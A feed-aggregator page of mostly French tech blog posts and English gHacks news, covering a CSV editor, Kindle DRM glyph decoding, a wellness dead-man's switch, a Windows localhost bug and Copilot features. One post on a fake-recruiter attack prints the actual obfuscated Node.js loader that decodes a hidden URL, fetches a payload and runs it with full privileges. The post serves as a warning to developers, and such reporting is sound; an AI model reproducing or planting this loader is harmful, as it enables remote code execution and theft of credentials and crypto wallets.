Agrégateur de flux

Les CSV, c’est comme les cafards et les politiciens. Tout le monde les déteste, mais ils survivront à l’apocalypse nucléaire. Ainsi, pendant que les formats propriétaires disparaissent avec leurs éditeurs au fil des ans, ce petit fichier texte avec des virgules continue tranquillement de faire tourner le monde.

Par exemple, 80% des datasets sur Kaggle sont en CSV et toutes les APIs qui valent quelque chose proposent un export CSV. Même votre comptable, ce gros nullos en informatique vous envoie des CSV.

Et vous, vous ouvrez ça avec quoi ? Excel ?

Aïe aïe aïe, Excel, votre meilleure ennemi en ce qui concerne les CSV ! Vous double-cliquez sur un fichier de 100 Mo, et le ventilo de votre machine s’emballe comme si vous miniez du Bitcoin ! La RAM explose et, PAF, 15 minutes plus tard, l’outil de Microsoft se crash. Ou pire, il ouvre le fichier, mais il a transformé les IDs en formules de maths, vos dates en n’importe quoi, et votre UTF-8 est massacré.

Bref, pas merci Microsoft.

Et c’est pas un problème théorique. Rien qu’en 2020, le Royaume-Uni a égaré 16 000 cas de COVID parce qu’Excel a une limite de 65 000 lignes par feuille, du coup des milliers de cas positifs n’ont jamais été contactés par les services de santé. Même JP Morgan a perdu 6 milliards de dollars à cause d’une erreur dans un fichier Excel. Et des centaines d’articles scientifiques ont dû être retirés parce qu’Excel avait corrompu des noms de gènes en les transformant automatiquement en dates.

Le problème, c’est qu’Excel n’a jamais été conçu pour éditer des CSV. Excel, c’est fait pour les tableaux croisés dynamiques et les graphiques en camembert que personne ne lit mais surtout pas pour bosser proprement avec des fichiers texte qui font 500 Mo.

Alors en bon geek, vous vous êtes surement déjà dit : OK, je vais utiliser autre chose. LibreOffice ? Même combat mais en moche. Un chouette éditeur de texte comme Notepad++ ou Sublime ? Super pour voir les virgules, mais nul pour visualiser la structure. Et les outils en ligne ? Lents, pas sécurisés, et vous envoyez vos données chez oncle Sam la plupart du temps. Bref, vous êtes coincé !

Et c’est après cette intro interminable (je m’en fous, c’est vendredi) qu’arrive SmoothCSV3, un éditeur CSV développé par kohii et dispo sur GitHub et dont l’ambition affichée par le dev est claire : devenir le VS Code des éditeurs tabulaires. Rien que ça !

Le logiciel tourne sur macOS et Windows, avec Linux en approche. Comme vous pouvez le voir sur ma capture écran, l’interface ressemble à un tableur classique, mais sous le capot, c’est du costaud. Le dev annonce une execution 12× plus rapide qu’Excel sur un fichier de 100 Mo et niveau fonctionnalités, vous avez la recherche et le remplacement, le tri, le filtrage, l’édition multi-cellules mais surtout, vous avez des requêtes SQL directement dans le CSV. Oui, du SQL dans un fichier texte avec des virgules. Ça vous permet de sélectionner vos colonnes avec un WHERE, de faire des JOINs entre plusieurs fichiers, et de les grouper avec un GROUP BY. C’est encore plus magique qu’Eric Antoine !

Il y a aussi une palette de commandes à la VS Code. Vous tapez Cmd+Shift+P et vous avez accès à toutes les fonctions du logiciel sans quitter le clavier. Si vous avez déjà utilisé VS Code, Sublime Text ou IntelliJ, vous êtes donc en terrain familier.

Alors oui, le CSV, c’est moche, c’est fragile, c’est chiant à parser, mais c’est universel, ça marche partout et surtout, ça traverse les époques. Ce qui lui manquait c’était surtout un outil qui le traite comme une princesse, avec le respect qu’il mérite.

Téléchargez SmoothCSV3 ici !

Voici l’histoire de Pixelmelt, un développeur qui voulait simplement sauvegarder en local un ebook acheté sur Amazon pour le lire avec une autre app parce que l’app Kindle d’Android a crashé une fois de trop à son goût.

Mais c’est impossible. Pas de bouton download, pas d’export, que dalle… Même si vous avez acheté le livre, c’est Amazon qui décide de comment et de quand vous pouvez le lire.

Bref, frustré, il se tourne alors vers le Kindle Cloud Reader, la version web de l’app. Et là, il découvre un truc incroyable ! Amazon a créé un système d’obfuscation tellement complexe qu’il ressemble aux techniques de cryptographie des manuscrits anciens. Mais siii, vous savez, ces textes enluminés que seuls les moines pouvaient déchiffrer au Moyen-Âge. Amazon a réinventé le concept en version numérique.

Pour fonctionner, le Kindle Cloud Reader utilise un endpoint de rendu qui nécessite plusieurs tokens d’authentification. Déjà c’est pas simple. Mais ça se corse un peu plus quand on regarde le texte qui s’affiche car ce ne sont pas des lettres ! Ce sont des glyphes, essentiellement des séries de coordonnées qui dessinent une lettre. Ainsi, au lieu de stocker le caractère ‘T’, Amazon stocke “glyphe 24” qui correspond à une forme dessinée via des commandes SVG. Et ces glyphes changent de mapping toutes les 5 pages, un peu comme un codex (coucou Dan Brown ^^) où l’alphabet se transforme à tous les chapitres.

Du coup, pour son livre de 920 pages, il a fallu faire 184 requêtes API distinctes. Chaque requête récupère un nouveau jeu de glyphes soit au total 361 glyphes uniques découverts, et 1 051 745 glyphes à décoder. Oui, ça fait plus d’un million de symboles à traduire pour lire un seul livre.

Amazon a même ajouté des pièges comme des micro-opérations MoveTo complètement inutiles dans les SVG qui s’affichent parfaitement dans le navigateur mais cassent toute tentative de parsing automatique. C’est de l’anti-scraping placé là volontairement, comme des fausses pistes dans des cryptogrammes médiévaux destinées à tromper les copistes non autorisés.

Face à ce délire, notre développeur est alors devenu malgré lui un crypto-archéologue. Sa méthode a donc été de comparer pixel par pixel chaque caractères, valider chaque hypothèse, pour tout reconstruire patiemment. Je vous passe les détails techniques mais il a sorti chaque glyphe SVG sous la forme d’une image, puis a comparé ces images pour trouver leur correspondance avec les vraies lettres en utilisant un outil (SSIM) qui simule la perception humaine pour évaluer la similarité entre deux images.

Résultat, 100% des glyphes matchés ont un score quasi-parfait ce qui lui a permis de reconstruire un fichier EPUB complet avec le formatage, les styles, les liens internes…etc. Tout y est, c’est trop fort !

Bref, Pixelmelt 1 - Amazon 0 ! Et ça, ça fait plaisir ! Maintenant si vous voulez connaitre tous les détails de ça et refaire la même chez vous (pour rigoler hein, ne vous lancez pas dans dans une opération de piratage massif sinon vous finirez en taule comme Sarko ^^)

Question flippante, hein ?

Vous postez des stories Instagram, vous faites des snaps, des TikToks, en bon nazi vous likez des tweets, vous répondez à des emails pro…etc. Votre vie numérique ronronne comme un chat sous coke mais si demain, tout ça s’arrêtait…? A votre avis, Combien de temps avant que quelqu’un ne toque à votre porte pour vérifier que vous allez bien ?

Un jour ? Deux jours ? Une semaine ?

On est tous hyperconnectés 24/7 mais personne ne surveille vraiment notre silence et vos 500 meilleurs amis de Facebook ne prendront jamais la peine de signaler votre disparition.

C’est de ce constat un peu morbide qu’est né Wellness Ping, un projet open source développé par micr0 et hébergé sur GitHub qui fonctionne comme ceci : Vous vous inscrivez dessus, et vous recevez un email régulier pour confirmer que vous allez bien. Si vous ne répondez pas, vos contacts d’urgence sont alors automatiquement alertés.

C’est ce qu’on appelle un dead man’s switch, le joujou préféré des cons de terroristes qui se font exploser dans les films des années 80. En gros, tant que vous confirmez votre présence, tout va bien mais si le silence se prolonge, l’alarme se déclenche.

Vous pouvez l’auto-héberger vous-même ou utiliser directement le site wellness-p.ing (C’est gratuit). Vous choisissez alors la fréquence des pings, soit quotidien ou hebdomadaire, selon votre niveau de paranoïa ou de solitude et quand vous recevez l’email, vous cliquez sur un lien ou vous répondez “PONG” et c’est tout. Pas de dashboard compliqué, pas de machins de gamification débiles…

Et si vous ne répondez pas parce que vous êtes coincé au chiottes depuis 3 jours, le système vous envoie un rappel. Si vous ne répondez toujours pas, il attend encore un peu. Et si le silence persiste, vos contacts d’urgence reçoivent alors automatiquement une alerte.

C’est clairement fait pour activistes, les journalistes, les chercheurs, et les gens qui vivent seuls. Bref, tous ceux dont la vie pourrait basculer sans que personne ne s’en rende compte immédiatement. Je pense pas exemple à tous ceux qui bossent en remote et qui n’ont pas de collègues pour remarquer leur absence.

Au Japon, il y a un mot pour ça d’ailleurs. Ils disent kodokushi pour “Mort solitaire” car là bas, des milliers de personnes par an meurent seules chez elles, et on ne les découvre que des jours ou des semaines plus tard. C’est d’ailleurs souvent parce que les voisins sentent que ça schlingue ou parce que le courrier s’entasse sous la porte. Je sais, c’est gore mais c’est la triste réalité.

Avec Wellness Ping on inverse donc la logique… Au lieu d’attendre que quelqu’un remarque votre absence, vous créez un système proactif où vous choisissez les contacts, vous qui décidez de la fréquence et comme ça, si un jour vous ne pouvez plus répondre, le filet de sécurité se déploie automatiquement.

Côté technique, le projet est développé en Go donc c’est léger, rapide, et la démo tourne sur un serveur en Suède parce que ce pays a une législation stricte sur les données personnelles.

Bref, c’est Wellness Ping, c’est une idée simple mais qui protège alors pensez-y !

A couple of days ago, I told you how you can regain access to your Google account using Recovery Contacts. Let's discuss the other recovery option that Google introduced, sign in with phone number.

Now, you may wonder, didn't Google already let you sign in using a phone number? Technically, no, but you're not completely wrong about that. Up until now, Google has allowed users to sign in to their account using your username, password, and your mobile number. Your phone number is used to receive an SMS for 2-step verification. That's not very secure, because the SMS protocol lacks support for encryption. You could, and should, use an authenticator app instead.

But let's get back to using a phone number to sign in. Google will ask you to enter your phone number, which is used to search for accounts connected to that number. This is done by verifying your number with your carrier, likely via an automated text message. Then, Google will display all accounts that are connected to your phone number. Select the one you want to sign in to, and then you will be asked to enter the passcode of your previous device. This is required to verify the sign in attempt and allow access to your encrypted data.

Is this secure? Well, it doesn't rely solely on SMS. You will need to enter your device's passcode to verify the account, so I'd say it is more secure. It also supports screen patterns. This might be useful if you don't have a secondary phone or access to your passkeys, 2FA, etc. The support article for the feature is available here, though it doesn't seem to explain much about it.

Google's announcement mentions that this method is useful when phones get lost, stolen or stop working. Though it doesn't portray it as such, you can use it for setting up a new phone. I haven't tested it, but it is not a recovery only option, it's a sign in option. That's what it is designed for, when you lose access to your phone, obviously you are going to be switching to a new phone. Right? It might be more convenient perhaps, but I'd probably still use a 2FA app, it's more secure as TOTPs can't be guessed or brute forced like a passcode or screen pattern can. Besides, this new method only works on Android devices, not on iOS, PC, Linux or Mac. So, you'll still need to use traditional login methods.

Google says the option to sign in with a phone number is slowly rolling out to users globally.

On a side note, Google Messages now protects you from spam links, and helps verify the identity of your contacts.

Thank you for being a Ghacks reader. The post Google's sign in with phone number option can help you recover your account appeared first on gHacks Technology News.

Vous avez peur que l’IA prenne votre boulot ? Et bien David Dodda, lui, a failli se faire avoir par un faux boulot et c’est son IA qui l’a sauvé ! Je vous explique !

Tout commence classiquement sur LinkedIn. David reçoit un message de Mykola Yanchii, Chief Blockchain Officer chez Symfa, une boîte qui développe des plateformes blockchain. Le profil LinkedIn a l’air béton… Il a plus de 1000 connexions, une page entreprise nickel, bref tout respire le sérieux.

Et son message est pro, poli, et propose à David un poste à temps partiel sur BestCity, une plateforme immobilière. Bref, c’est le genre d’opportunité qu’on ne refuse pas quand on est développeur freelance comme David.

Le premier rendez-vous par visio se passe très bien. Le recruteur connait son sujet, pose les bonnes questions, explique le projet et ensuite, comme dans 99% des processus de recrutement tech, on envoie à David un test technique à réaliser chez lui. Il s’agit d’un projet hébergé sur Bitbucket, du code React et Node.js bien propre et sa mission c’est de compléter quelques fonctionnalités et renvoyer le tout avant la prochaine réunion.

Sauf que David, lui, a pris un réflexe que peu de gens ont. Avant même de lancer npm install, il a demandé à son assistant IA (Cursor) de scanner le code pour détecter d’éventuels patterns suspects. Et là, bingo ! L’IA trouve un truc louche dans le fichier server/controllers/userController.js.

Il s’agit d’un malware qui était bien planqué dans une fonction asynchrone complètement obfusquée. Un tableau d’octets encodé en ASCII qui, une fois décodé en UTF-8, révèle une URL pointant vers une API externe. Et cette URL récupère un payload qui est ensuite exécutée avec tous les privilèges Node.js. Cela débouche à sur un accès complet au système, aux credentials, aux wallets crypto, aux données clients…etc. Le jackpot pour un attaquant !

//Get Cookie (async () => { const byteArray = [ 104, 116, 116, 112, 115, 58, 47, 47, 97, 112, 105, 46, 110, 112, 111, 105, 110, 116, 46, 105, 111, 47, 50, 99, 52, 53, 56, 54, 49, 50, 51, 57, 99, 51, 98, 50, 48, 51, 49, 102, 98, 57 ]; const uint8Array = new Uint8Array(byteArray); const decoder = new TextDecoder('utf-8'); axios.get(decoder.decode(uint8Array)) .then(response => { new Function("require", response.data.model)(require); }) .catch(error => { }); })();

Et le truc flippant, c’est le niveau de sophistication de l’opération car là on n’a pas affaire à un script kiddie qui balance un trojan par email. Non, c’est une vraie infrastructure professionnelle avec un profil LinkedIn premium, un Calendly pour la prise de rendez-vous, un Bitbucket privé, du code source propre et fonctionnel (hormis le malware planqué). Et surtout, l’URL du malware est devenue HS 24 heures à peine après l’attaque. C’est donc une infrastructure éphémère qui laisse zéro trace.

Si je relaye ce témoignage de David c’est parce que ce genre d’attaque se multiplie. Ce n’est pas un cas isolé… Par exemple le groupe nord-coréen Lazarus utilise cette technique depuis des mois, en créant de fausses entreprises crypto, de faux profils de recruteurs sur LinkedIn, Upwork, Freelancer, et en ciblant spécifiquement les développeurs. Le malware déployé s’appelle BeaverTail, et il installe ensuite un backdoor Python baptisé InvisibleFerret qui fonctionne sur Windows, Linux et macOS. Ce truc vise surtout les extensions de navigateur comme MetaMask ou Coinbase Wallet, récupère tous les mots de passe stockés, et collecte tout ce qui traine.

Alors pourquoi ça marche aussi bien ?

Hé bien parce que les hackers exploitent nos biais cognitifs. L’ambition de décrocher un bon job, la politesse pour ne pas vexer un recruteur, l’urgence créée artificiellement pour qu’on ne prenne pas le temps de réfléchir, la peur de rater une opportunité. Bref, toutes ces émotions qui court-circuitent notre esprit critique.

Heureusement que David a lancé une analyse IA du code sinon, il aurait eu de gros problèmes. Ça prend 30 secondes comme geste barrière et ça peut vous sauver des milliers d’euros et des centaines d’heures de galère.

Si David n’avait pas eu ce réflexe, il aurait lancé npm install, puis npm start, et le malware se serait exécuté en arrière-plan pendant qu’il codait tranquillement ses fonctionnalités. L’attaquant aurait alors eu accès à tout : Ses identifiants GitHub, ses clés SSH, ses tokens d’API, ses wallets crypto si il en a et peut-être même les données de ses clients. Le cauchemar absolu.

Voilà, donc méfiez vous de ce qui arrive via des plateformes de recrutement, on ne sait jamais ! Vous n’aurez peut être pas le job mais vous garderez votre ordinateur propre, vous conserverez vos cryptos, vos mots de passe et vos clients et ça c’est déjà pas si mal !

Source

Meta has announced that it is discontinuing its Messenger app for Windows and Mac. The standalone apps are being deprecated in December.

Apple Insider spotted a couple of help pages on Facebook's website that indicated that the apps are being retired. It's unclear why the apps are being killed. As a reminder, Meta replaced its native Messenger app on Windows with a progressive web app in late 2024. A few months ago, the WhatsApp UWP app was also replaced with a web wrapper. Users were upset by both changes.

Meta will notify Messenger desktop users that the app is being retired, via an in-app notification, after the app's deprecation process begins. Existing users will be able to use the Messenger app on Windows or Mac for 60 days before it is fully deprecated. After that, the app will stop working altogether. That doesn't mean existing users get a 60-day grace period. The help pages say that the app is being deprecated, as in it has happened already.

Meta confirmed to TechCrunch that the Messenger desktop apps for Mac and Windows are scheduled to be shut down on December 15, and that's 60 days from now. Users will not be able to sign in to the app, and will be redirected to the Facebook website, where they can continue to access Messenger. Or you can use the Facebook desktop app to use Messenger app for chatting, and calling. The app is only available for Windows, there is no Facebook app for Mac, which means you're stuck with the website. As I mentioned earlier, even the Windows app is just a web wrapper anyway.

Meta is advising users to export their chat history from the app by activating secure storage from Privacy and Safety > End-to-end encrypted chats > Message storage, set up a PIN to save the chats, before switching to Facebook.com. Here is the support page for Messenger on Windows, and this is for the Mac version.

Did you use the Messenger app on your computer?

Thank you for being a Ghacks reader. The post Meta is shutting down its Messenger desktop apps on Windows and Mac appeared first on gHacks Technology News.

Vous avez déjà passé trois semaines à résoudre un problème qui n’existe pas ?

Hé bien Sam Hoarder, lui, a fait encore mieux. Il a pris un drone FPV déjà ultra-compact, le BetaFPV Air65 avec ses 65mm d’empattement, et l’a transformé en un truc trois fois plus petit, dix fois plus galère à piloter, et totalement inutile !

22 millimètres d’empattement de moteur à moteur, ça qui tient dans une boîte de Pringles et c’est génial. Parce que OUI, dans un monde tech obsédé par des specs toujours plus impressionnantes, des autonomies de 48 heures et des écrans pliables dans tous les sens, Sam a fait un truc qui sert à rien. Il a pris un drone qui vole très bien et s’est dit “hey, comment je pourrais rendre ce drone encore moins pratique à pilote ?”

Les hélices de l’Air65 de base font 31mm de diamètre, les moteurs font 9mm et si on fait se chevaucher les quatre hélices au maximum, on obtient théoriquement 31 - 9 = 22 mm d’empattement. Voilà, c’est tout… sauf que pour y arriver, il a fallu modéliser chaque composant dans SolidWorks, designer un cadre custom en deux plaques avec des supports moteur décalés, imprimer le tout en PLA avec une précision de 0,12 mm, et bien sûr démonter entièrement l’Air65 pour en remonter les moteurs avec des vis de montre, découper des oeillets au micron près, reconfigurer l’orientation du contrôleur de vol dans Betaflight avec un angle à 45°, et croiser les doigts très fort !!

Et le résultat est là puisque sont nouveau drone pèse 25 grammes tout mouillé avec sa batterie Lava 300mAh (qui est plus grande que le drone lui-même, au passage). La batterie dépasse donc littéralement du cadre. On dirait un cure-dent avec un sac à dos son machin et les quatre hélices se frôlent avec un espacement ridicule.

Et pour le décollage, c’est impossible de la faire partir posé au sol, car les hélices se touchent. Il faut donc le tenir délicatement entre deux doigts, armer les moteurs en priant pour ne pas déclencher le système anti-runaway, et le lâcher au moment précis où il commence à tenir.

Sam a filmé ses premiers essais et on le voit galérer pendant trois bonnes minutes, le drone dans une main, la radiocommande dans l’autre, essayant de trouver le timing parfait. C’est stressant à regarder, j’avoue et quand il y arrive enfin, le drone s’envole, vole correctement (ce qui est déjà un miracle), et on se dit “OK, mais maintenant il va faire quoi avec ?”

Hé bien rien. Absolument rien ^^.

Par contre, Sam a mis tous ses fichiers 3D gratuitement sur MakerWorld donc libre à vous de reproduire ce projet complètement inutile si ça vous chauffe.

Amusez-vous bien !

Vous connaissez ce mème que tous les barbus sans originalité ont sur un t-shirt ou une tasse et qui dit : “There’s no place like 127.0.0.1” ? (Oui moi aussi j’ai eu un t-shirt comme ça ^^)

Ce jeu de mots culte fait référence au Magicien d’Oz et surtout au localhost, qui est l’adresse locale où votre machine se connecte à elle-même. Eh bien mauvaise nouvelle, Microsoft vient de la rendre littéralement inopérante avec leurs dernières mises à jour de merde. Ainsi, Windows 11 ne peut plus accéder à sa propre adresse localhost. C’est fou quand même ! On dirait presque une blague mais non…

Les patchs KB5066835 et KB5065789 sortis en joli mois d’octobre ont pété totalement HTTP.sys, un composant du kernel Windows qui permet aux applications de discuter en local via HTTP/2. Du coup, les connexions vers 127.0.0.1 en HTTP/2 plantent systématiquement avec des messages d’erreur du genre ERR_CONNECTION_RESET ou ERR_HTTP2_PROTOCOL_ERROR.

Votre machine ne se reconnaît plus. Elle est là, elle fonctionne, mais elle ne peut plus se pinguer elle-même. Et évidemment, ceux qui trinquent ce sont surtout les développeurs. Visual Studio ne peut plus déboguer correctement, SQL Server Management Studio refuse de se connecter avec l’authentification Entra ID, l’application Duo Desktop, utilisée pour le 2FA, est complètement KO. Même des softs pros comme Autodesk Vault sont touchés.

Bref, si vous bossez avec du dev local ou des outils qui tournent en localhost, vous êtes dans la mierda.

Microsoft a corrigé dans ce patch un nombre record de 175 vulnérabilités CVE, dont 6 zero-days critiques et ils ont aussi fait le ménage en supprimant un vieux driver Agere Modem vieux de 20 ans qui traînait encore. Ils ont nettoyé, sécurisé, et optimisé Windows un peu plus mais visiblement sans faire quelques vérifications de base. Je trouve ça vraiment surprenant qu’aucun dev chez Microsoft ne s’en soit rendu compte avant que ça parte en prod.

Bon et alors, comment on s’en sort de leur nouvelle connerie ? Hé bien il y a 2 solutions, pas très classes mais qui fonctionnent.

La première, c’est de bidouiller le registre Windows pour désactiver HTTP/2. Vous allez dans

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HTTP\Parameters

Et vous mettez EnableHttp2Tls et EnableHttp2Cleartext à 0.

Redémarrage obligatoire (C’est Windows, bébé) et voilà !

La deuxième solution, plus radicale, consiste à désinstaller les mises à jour. Un petit coup de

wusa /uninstall /kb:5066835

ou

wusa /uninstall /kb:5065789

dans votre terminal et hop, vous retrouvez votre localhost fonctionnel, sauf que voilà, au bout d’un moment, Windows Update va gentiment vous les réinstaller automatiquement au prochain redémarrage si vous ne faites pas gaffe. C’est un peu comme votre ex toxique qui revient sans cesse dans votre vie…

Le truc encore plus wtf dans cette histoire, c’est que ce bug n’existe pas sur les installations toutes fraîches de Windows 11 24H2. Donc si vous installez Windows 11 proprement depuis zéro, localhost fonctionnera nickel. C’est seulement si vous avez mis à jour votre machine que vous êtes maudit du cul. Microsoft suggère donc “implicitement” que la meilleure solution serait… de tout réinstaller ! Bah ouais, on a que ça à foutre ! Merci du conseil, les gars.

Bref, encore une fois, on a l’impression que les équipes QA de Redmond ont pris des vacances prolongées. Bref, encore un fail monumental ! Bilou reviens, tu nous manques ! ^^

Voilà, donc si vous êtes développeur et que Visual Studio vous fait la gueule depuis début octobre comme un ado qui viendrait de se lever, vous savez maintenant pourquoi. Ce n’est pas votre code qui est pourri (enfin, peut-être qu’il l’est, mais c’est un autre sujet…), c’est juste Windows 11 qui a la gueule de bois !

Home sweet home ? Plutôt “home where is my home ?”, ouais.

Source

Le groupe hôtelier Sun Siyam annonce le lancement de son concours mondial sur Instagram, intitulé « Win the Maldivian Spirit » (Gagnez l'Esprit Maldivien), dans le cadre de l'évolution de sa marque et à l'occasion de son 35e anniversaire. Le concours, qui se déroule sur le compte Instagram [@sunsiyamresorts->https://www.instagram.com/sunsiyamresorts d'octobre à novembre 2025, invite les voyageurs du monde entier à vivre une expérience unique aux Maldives, avec à la clé un séjour de 7 nuits pour un (...)

- Communiqué de presse / Sun Siyam Resorts , Instagram, anniversaire, concours, Maldives

Il aura fallu deux ans de rénovation minutieuse pour redonner au légendaire Brenners Park-Hotel & Spa tout son éclat. Dans l'écrin verdoyant de la ville thermale Baden-Baden, cet hôtel 5 étoiles réaffirme sa place parmi les adresses les plus iconiques de la ville.
Depuis plus de 145 ans, ce sanctuaire de bien-être accueille ses hôtes au sein d'un parc privé majestueux pour une reconnexion à l'essentiel. Sa rénovation a su préserver l'esprit du lieu, tout en révélant une nouvelle vision du luxe.
Une (...)

- Communiqué de presse / rénovation, réouverture, Baden-Baden

Le Musée National Zayed, musée national des Émirats arabes unis (UAE) situé au cœur du quartier culturel de Saadiyat, l'un des plus grands centres culturels au monde, ouvrira ses portes au public le 3 décembre 2025. Les billets sont disponibles dès maintenant sur zayednationalmuseum.ae. Le Musée National Zayed retrace l'histoire du pays à travers un parcours immersif qui s'étend de l'Antiquité à nos jours. Il mêlera des artefacts archéologiques et des objets historiques à des expériences audiovisuelles (...)

- Communiqué de presse / Abu Dhabi, Emirats Arabes Unis, musée, ouverture

Désignée meilleure destination MICE d'Asie selon le classement Cvent 2025 et le GDS Index 2025, Singapour trace une nouvelle feuille de route ambitieuse à horizon 2040 pour tripler ses recettes dans le tourisme d'affaires et de congrès. Fort de son accessibilité internationale, de son écosystème d'innovation, de son engagement concret en faveur de la durabilité et de sa réputation de fiabilité, la Cité-Etat renforce sa position de capitale mondiale des événements professionnels à impact positif.
Une (...)

- Communiqué de presse / Singapour, Asie, MICE

Microsoft announced the launch of Copilot Vision and Copilot Voice to all Windows 11 PCs yesterday. The opt-in features introduce options to talk to the AI and to give access to your screen. The features are rolling out worldwide.

It appears that Windows 11 is getting another big update, which Microsoft announced yesterday as well on the Windows Experience Blog.

Microsoft calls these new features experiences that are rolling out to Windows 11 devices as well. Unsurprisingly, many of them are also AI-related.

Windows 11: new features and improvements

Here is an overview of what Microsoft is launching for Windows 11:

• File Explorer is getting AI actions: Unlocks AI functionality, such as getting a summary of a document , including OneDrive and Sharepoint files, or editing images, right from the file manager. Image editing is limited to the four: Bing Visual Search, blur background, erase objects, and remove background.
• Microsoft 365 People cards: File Explorer will display people icons in the Activity column for commercial customers who sign in with an Entra ID.
• Widgets visual update: The widgets interface got a visual update with a layout that is "more organized, personalized, and engaging" according to Microsoft. It also includes Copilot-curated stories now and content from "trusted MSN premium publishers". Also new, multiple dashboards for your widgets board, and widgets on the lock screen.
• Accessibility improvements: Narrator includes a Braille viewer now, which "shows both on-screen text and its Braille equivalent". You may launch Braille viewer with the keyboard short Windows-Ctrl-Enter, pressing the Narrator key-Alt-B. Microsoft says that the Narrator experience in Word has been improved as well, offering better "oice feedback, reliable continuous reading, and better navigation for footnotes, comments, lists and tables".
• Gaming Copilot, a beta feature that introduces the AI for gaming related activities, is now integrated into Game Bar. Gamers can, for instance, talk to Copilot to get game related help, while playing a game.
• The Xbox PC app displays your gaming library across devices now and enables you to access apps and play history.
• A new Network Quality Indicator tool can be launched by clicking on the profile pic in the Xbox PC app > Settings > Cloud Gaming > Network Quality Indicator.
• Windows Hello is getting a visual refresh. Windows 11 prioritizes the "best credential" automatically now when you sign in to a Windows 11 PC with a Microsoft account.
• Passkeys: Windows 11 has a seamless passkey manager integration, which users can turn on via Settings > Accounts > Passkeys > Advanced options.
• Microsoft Edge is now using the password manager instead of the legacy Wallet experience, which Microsoft says has been retired. It improves integration with Microsoft accounts.
• Improved kernel security. Parts of Windows 11 have been rewritten in Rust to "help mitigate against memory corruption vulnerabilities". Driver developers may also start writing drivers in Rust.
• Wi-Fi 7 support :Microsoft is rolling out support for the new wireless standard.
• Redesigned Advanced settings page, especially for Developers.
• Microsoft Edit is a new command line text editor that is integrated into Windows.
• Windows ML is now generally available.
• Advanced shader delivery is now available for games on Windows 11 PCs. This feature should reduce the initial long load times and disruptive stuttering during a game's first launch, according to Microsoft.

Microsoft announced a good dozen smaller tweaks to Windows 11 next to that. The CPU workload metric in the Task Manager, for instance, is now consistent, and you find new top level divider icons in File Explorer for the five actions displayed at the top.

Last but not least, Copilot+ PCs get a range of changes and new features:

• Recall's personalized homepage shows a user's recent activity and top-used apps and websites, as well as recent snapshots.
• Click to Do shows "new and popular action tags" in its context menu.
• Agent in Settings  offers direct navigation links now, and it is available across all compatible PCs.
• Voice access using natural language.
• Paint is getting project files and an opacity slider.
• The Snipping Tool is getting a quick markup option. This allows you to make edits to the image right in the tool's selection area before the screenshot is finished.
• Notepad supports AI features like summarize or rewrite now.

PCs need to update to Windows 11, version 25H2 first. The latest security update for Windows 11 needs to be installed as well on the machine before the features become available.

Also worth nothing is that Microsoft is rolling the features out gradually. Means, if you are unlucky, you may not see a single new feature immediately after upgrading to the latest version.

Now You: What is your take on the features? Something that you find interesting or waited for a long time? Feel free to leave a comment down below.

Thank you for being a Ghacks reader. The post Windows 11 is getting a big feature update, after its feature update appeared first on gHacks Technology News.

Microsoft's Windows account on X published several short cryptic messages in the past two days regarding a new announcement that the company wanted to make today.

The first message "Your hands are about to get some PTO. Time to rest those fingers…something big is coming Thursday" suggested that the feature would help users type less.

Today, Microsoft has lifted the veil and announced plans to make "every Windows 11 PC an AI PC" on the official Windows Experience blog on its Windows website.

At the core of the new experience is the Hey Cortana, ups, Hey Copilot phrase that all Windows 11 users may use to interact with the AI using their voice. In addition, Copilot Vision is there to analyze anything that you see on the screen.

Hey Copilot

Hej Copilot is an opt-in feature, which is a refreshing change for a start. You need to activate the feature in the settings before Copilot reacts to you uttering the new command phrase to start a conversation with the AI.

Windows displays a Copilot microphone on the screen, so that you know that the conversation is taking place. To end a conversation, all you need to say is Goodbye, according to Microsoft. You can also click on the x-icon instead, if you prefer using your hands for that.

So, if you prefer to use your voice to interact with the AI, now you can.

Copilot Vision

Copilot Vision, which gives the AI access to what you see on the screen, is now available worldwide in all markets that Copilot is available according to Microsoft.

Microsoft lists the following main features:

• Full desktop and app sharing - Copilot can analyze content that you share to "provide insights and answer your questions".
• You can ask Copilot "show me how" to get guidance in an application or game.
• Copilot Vision has full app content in Word, Excel and PowerPoint. Means, even if you just share a document, it has access.
• Coming soon is a feature that Microsoft calls text-in text-out. This allows you to use text prompts to interact with Copilot Vision.

Last but not least, there is Manus, a general AI agent that can perform "various tasks" on user PCs. Microsoft explains that Manus can create a website from files in File Explorer, all without coding. It is available as a native app on Windows. It is available as a private preview, which means that it may take a while before it lands on Windows 11 PCs for the general public.

Microsoft reveals some information on security regarding AI agents on Windows. It says that users are "always in control of what Copilot Actions can do" and have visibility into what the AI is doing.

A second post reveals details.

• The agents use distinct accounts, which paves the way for agent-specific policies.
• Agents have limited permissions at first according to Microsoft, which can be expanded by the user.
• Agents need to be signed with a trusted source.
• The Microsoft privacy statement and responsible AI standard apply.

Microsoft says that the features are available to all Windows 11 PCs, and not only Copilot+ PCs. Do these have any advantage regarding the features? Microsoft does not say. Clearly, the feature relies on processing that is done on Microsoft servers, at least for PCs without an NPU. That is something to keep in mind, as what you say, show, or do may find its way on to Microsoft servers.

Still, for users who want the Copilot experience but have a non-Copilot+ PC, it marks an opportunity to give it a go.

Thank you for being a Ghacks reader. The post Windows 11: Microsoft expands Copilot Voice and Vision to all PCs appeared first on gHacks Technology News.

Apple has unveiled its next-gen MacBook Pro laptop. The device is powered by a new M5 Apple Silicon.

Apple's newest in-house chip has a 10-Core CPU with 4 performance cores and 6 efficiency cores, a 10-Core GPU that supports hardware-accelerated ray tracing, a 16-Core Neural Engine, and neural accelerators. The laptop comes with 16GB/24GB/32GB of Unified Memory (RAM) with 153GB/s memory bandwidth, and 512GB/1TB/2TB/4TB of SSD storage. The M5 MacBook Pro sports a 120Hz ProMotion 14.2” Liquid Retina XDR display (mini-LED), that has a resolution of 3024 x 1964 pixels, 1000 nits sustained brightness, and 1600 nits peak for HDR. There is an option for a Nano-texture screen that will set you back by $150.

The M5 MacBook Pro comes with a 12MP Center Stage camera that supports 1080p HD video recording, and a High-fidelity six-speaker sound system with force-cancelling woofers, wide stereo sound, spatial audio, Dolby Atmos, and a 3-mic array. As for connectivity, the M5 MacBook Pro supports Wi-Fi 6E 802.11 ax, Bluetooth 5.3, has 3 Thunderbolt 4 ports, an HDMI port, an SDXC card slot, a headphone jack, and a MagSafe 3 port. The laptop runs on macOS Tahoe 26 out of the box, and supports Apple Intelligence AI features.

